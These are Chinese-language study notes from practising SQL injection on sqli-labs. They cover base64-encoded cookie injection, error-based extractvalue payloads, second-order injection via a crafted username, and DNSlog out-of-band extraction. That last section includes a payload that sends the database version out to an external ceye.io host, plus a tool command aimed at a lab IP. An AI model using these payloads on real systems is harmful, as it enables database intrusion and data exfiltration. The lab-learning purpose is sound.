实例1:sqli-labs21
输入admin,admin 测试:
可以看到注入点在cookie处,发送到decoder(解密)
所以如果要注入,需要将注入语句加密
Eg:admin’ and 1=1加密后:YWRtaW4ZIGFuZCAxPTEK
(19条消息) sql注入之报错注入silence1的博客-CSDN博客_报错注入
0x7e='~'
concat('a', 'b')=“ab”version()=@@version
~可以换成'#'、$'等不满足xpath格式的字符
extracvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位
查询注入点
Payload:
-----JykgdW5pb24gc2VsZWN0IDEsMiwzIw==
------后续步骤详情见sqli-labs
二次注入:
在注册页面注册一个新用户:batman’#
修改密码
查看到密码被更新的是dhakkan,原理:
二次注入一般无法通过人工或工具扫描得出,一般都需要配合代码去分析
Dnslog注入:解决了盲注不能回显数据,效率低的问题
Eg:
CEYE - Monitor service for security testing
Payload:select * from users where id=1 and if((select load_file(concat('\\',(select version()),'llpd8b.ceye.io\abc'))),1,0);
DNSlog注入工具:
GitHub - ADOOO/DnslogSqlinj
Sqli-labs9
dnslogSql.py -u http://192.168.32.1/sqli-labs/Less-9/?id=1' and ({})--+